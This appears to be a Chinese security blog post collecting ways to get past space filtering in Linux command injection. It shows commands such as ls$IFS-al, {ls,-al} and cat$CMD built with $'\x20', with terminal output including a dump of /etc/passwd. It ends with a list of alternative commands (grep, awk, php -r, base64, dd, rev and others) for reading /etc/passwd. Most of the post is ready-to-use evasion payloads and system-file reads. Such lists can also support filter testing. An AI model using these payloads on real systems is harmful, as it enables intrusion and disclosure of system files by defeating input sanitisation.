Linux跨文本命令执行

来源:互联网 发布:曙光虚拟化软件 编辑:程序博客网 时间:2024/06/06 02:14

在搞安全的时候经常会遇到代码/命令执行,不能用空格的情况,总结了几种的绕过方法。

0x01 linux下不用空格执行带参数的5种姿势

1.!!

1 [root@Vincent0day tmp]# pwd2 /tmp3 [root@Vincent0day tmp]# !!4 pwd5 /tmp6 [root@Vincent0day tmp]# 

2.$IFS

 1 [root@Vincent0day tmp]# ls$IFS-al 2 total 40 3 drwxrwxrwt.  8 root root     4096 Nov 17 04:18 . 4 dr-xr-xr-x. 27 root root     4096 Nov 14 16:27 .. 5 srwxrwxrwx   1 root root        0 Oct 12 14:37 Aegis-<Guid(5A2C30A2-A87D-490A-9281-6765EDAD7CBA)> 6 -rw-r--r--   1 root root      460 Nov 14 16:27 cron.rule 7 drwxrwxrwx   2  502 test2    4096 Nov  8 11:01 disktables 8 -rw-rw-r--   1  501 filetest    0 Nov  8 10:58 file 9 drwxrwxrwt   2 root root     4096 May 18  2016 .ICE-unix10 drwxr-xr-x   2 root root     4096 Nov 14 16:27 install_agent11 srwxrwxrwx   1 root root        0 Sep 22 14:45 mongodb-27017.sock12 srwxrwxrwx   1 root root        0 Oct 12 14:37 qtsingleapp-aegisG-46d213 srwxr-x---   1 root root        0 May 18  2016 qtsingleapp-aegisG-46d2-014 srwxrwxrwx   1 root root        0 May 18  2016 qtsingleapp-aegiss-a5d215 srwxrwxrwx   1 root root        0 May 18  2016 qtsingleapp-aegiss-a5d2-016 drwxrw-r--   2 root root     4096 Nov 16 15:57 rd4Xy6JfY917 drwxr-xr-x   2 root root     4096 Nov 10 09:56 test18 -rw-r--r--   1 root root      477 Nov 14 16:30 tt_install_shell.log19 drwxrw-r--   2 root root     4096 Nov 14 16:52 XUgJsg1WK620 [root@Vincent0day tmp]# 

3.{}

1 [root@Vincent0day tmp]# {ls,-al} 2 total 40 3 drwxrwxrwt.  8 root root     4096 Nov 17 04:18 . 4 dr-xr-xr-x. 27 root root     4096 Nov 14 16:27 .. 5 srwxrwxrwx   1 root root        0 Oct 12 14:37 Aegis-<Guid(5A2C30A2-A87D-490A-9281-6765EDAD7CBA)> 6 -rw-r--r--   1 root root      460 Nov 14 16:27 cron.rule 7 drwxrwxrwx   2  502 test2    4096 Nov  8 11:01 disktables 8 -rw-rw-r--   1  501 filetest    0 Nov  8 10:58 file 9 drwxrwxrwt   2 root root     4096 May 18  2016 .ICE-unix10 drwxr-xr-x   2 root root     4096 Nov 14 16:27 install_agent11 srwxrwxrwx   1 root root        0 Sep 22 14:45 mongodb-27017.sock12 srwxrwxrwx   1 root root        0 Oct 12 14:37 qtsingleapp-aegisG-46d213 srwxr-x---   1 root root        0 May 18  2016 qtsingleapp-aegisG-46d2-014 srwxrwxrwx   1 root root        0 May 18  2016 qtsingleapp-aegiss-a5d215 srwxrwxrwx   1 root root        0 May 18  2016 qtsingleapp-aegiss-a5d2-016 drwxrw-r--   2 root root     4096 Nov 16 15:57 rd4Xy6JfY917 drwxr-xr-x   2 root root     4096 Nov 10 09:56 test18 -rw-r--r--   1 root root      477 Nov 14 16:30 tt_install_shell.log19 drwxrw-r--   2 root root     4096 Nov 14 16:52 XUgJsg1WK620 [root@Vincent0day tmp]# 

4.<>

1 [root@Vincent0day tmp]# vim test2 [root@Vincent0day tmp]# ls3 Aegis-<Guid(5A2C30A2-A87D-490A-9281-6765EDAD7CBA)>  disktables     mongodb-27017.sock       qtsingleapp-aegisG-46d2-0  qtsingleapp-aegiss-a5d2-0  test                  XUgJsg1WK64 cron.rule                                           install_agent  qtsingleapp-aegisG-46d2  qtsingleapp-aegiss-a5d2    rd4Xy6JfY9                 tt_install_shell.log5 [root@Vincent0day tmp]# cat<>test 6 hello7 [root@Vincent0day tmp]# cat test 8 hello9 [root@Vincent0day tmp]# 

5.\x20

1 [root@Vincent0day ~]# CMD=$'\x20/etc/passwd'&&cat$CMD 2 root:x:0:0:root:/root:/bin/bash 3 bin:x:1:1:bin:/bin:/sbin/nologin 4 daemon:x:2:2:daemon:/sbin:/sbin/nologin 5 adm:x:3:4:adm:/var/adm:/sbin/nologin 6 lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin 7 sync:x:5:0:sync:/sbin:/bin/sync 8 shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown 9 halt:x:7:0:halt:/sbin:/sbin/halt10 mail:x:8:12:mail:/var/spool/mail:/sbin/nologin11 uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin12 operator:x:11:0:operator:/root:/sbin/nologin13 games:x:12:100:games:/usr/games:/sbin/nologin14 gopher:x:13:30:gopher:/var/gopher:/sbin/nologin15 ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin16 nobody:x:99:99:Nobody:/:/sbin/nologin17 dbus:x:81:81:System message bus:/:/sbin/nologin18 vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin19 abrt:x:173:173::/etc/abrt:/sbin/nologin20 haldaemon:x:68:68:HAL daemon:/:/sbin/nologin21 ntp:x:38:38::/etc/ntp:/sbin/nologin22 saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin23 postfix:x:89:89::/var/spool/postfix:/sbin/nologin24 sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin25 tcpdump:x:72:72::/:/sbin/nologin26 nscd:x:28:28:NSCD Daemon:/:/sbin/nologin27 apache:x:48:48:Apache:/var/www:/sbin/nologin28 mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false

0x02 读文件姿势

grep . /etc/passwdawk '{print $0}' /etc/passwdphp -r "echo file_get_contents('/etc/passwd');"base64 -i /etc/passwddd count=1000 bs=1 if=/etc/passwd 2>/dev/nullsort /etc/passwduniq /etc/passwdstrings /etc/passwdegrep|fgrep|rgrep|agrep "" /etc/passwdrev /etc/passwdcomm /etc/passwd /etc/passwdpaste /etc/passwd只用echo: echo $(</etc/issue) 或者 echo `</etc/issue`
原创粉丝点击